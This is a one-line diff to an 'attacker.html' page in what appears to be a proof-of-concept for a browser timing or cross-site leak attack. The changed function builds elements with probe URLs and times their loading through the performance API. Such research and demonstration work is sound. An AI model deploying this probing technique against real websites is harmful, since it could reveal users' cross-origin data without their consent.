--- a/src/poc2/attacker.html
+++ b/src/poc2/attacker.html
@@ -11,7 +11,7 @@
       function get(element, attribute, url, size) {
         let start = performance.getEntries().length;
         let e = document.createElement(element);
-        e[attribute] = `${url}?size=${size}&id=${performance.now()}&tag=${element}`;
+        e[attribute] = `${url}?size=${size}&id=${performance.now()}&${element}`;
         document.body.append(e);
 
         e.onload = () => {
